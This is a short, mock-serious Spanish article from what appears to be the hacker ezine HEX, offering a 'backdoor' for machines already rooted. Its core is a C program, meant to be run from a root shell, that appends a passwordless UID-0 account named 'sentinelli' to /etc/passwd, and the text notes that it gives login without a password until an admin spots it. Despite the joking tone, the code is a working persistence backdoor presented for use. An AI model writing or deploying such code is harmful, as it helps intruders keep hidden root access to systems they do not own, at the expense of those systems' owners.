 < ---------------------------- [ HEX ezine ] ------------------------------- >
 < - [ Taller de Manualidades con Daniel Sentinelli ] ----------------------- >
 < - [ by snt0 ] ------------------------------------------- (HEX 10) - >
   
$telnet target.com 25

Como les habia promuetido en la edicion anterior, hoy vamos a ver como hacer
una backdoor de manera que cuando rootiemos el pentagono no sea necesario
hax0rearlo nuevamente al otro dia.
Bien, aca tienen el codigo el cual tendran que ejecutar desde su root shell.


=================================>8====CUT HERE============================
/*
 * snt-backdoor.c
 * (C) Daniel Sentinelli
 * This program complies with GNU Public License
 * See 'README' for more details.
 * Type "$gcc snt-backdoor.c -o sent-bkdr" to compile
 */
 
#include <stdio.h>
main()
{
    FILE *x;
    x = fopen ("/etc/passwd" , "a");
    fprintf (x, "%s\n", "sentinelli::0:0:Te estoy re haxoreando:/root:/bin/bash");
    fclose (x);
}
=================================>8====CUT HERE============================

La explicacion del programa no es sencilla ya que estamos trabajando con 
streams y hay que tener mucha experiencia en C, ASM y FORTRAN para hacerlo.
Pero si quieren saber mas pueden consultar "Teach Yourself C in 21 days"
un tutorial que se puso de moda en la comuna hacker en los ultimos dias.
Tambien pueden leer "AT&T Macroassembler for x86" si lo desean.
A traves de esta backdoor, ustedes se podran loguear en la maquina con
el username 'sentinelli' y como notaran, no les pedira password.
Esto tendria que funcionar a menos que el admin haga un #cat /etc/passwd
y se de cuenta de que lo estuvimos rehackeando por 20 dias seguidos y haga
un shutdown del server.
Me despido de ustedes hasta el proximo numero, y recuerden que esta backdoor 
sigue la filosofia GNU por lo cual pueden modificarla y distribuirla libremente.
Si quieren saber mas sobre GNU miren Dominio Digital los lunes.



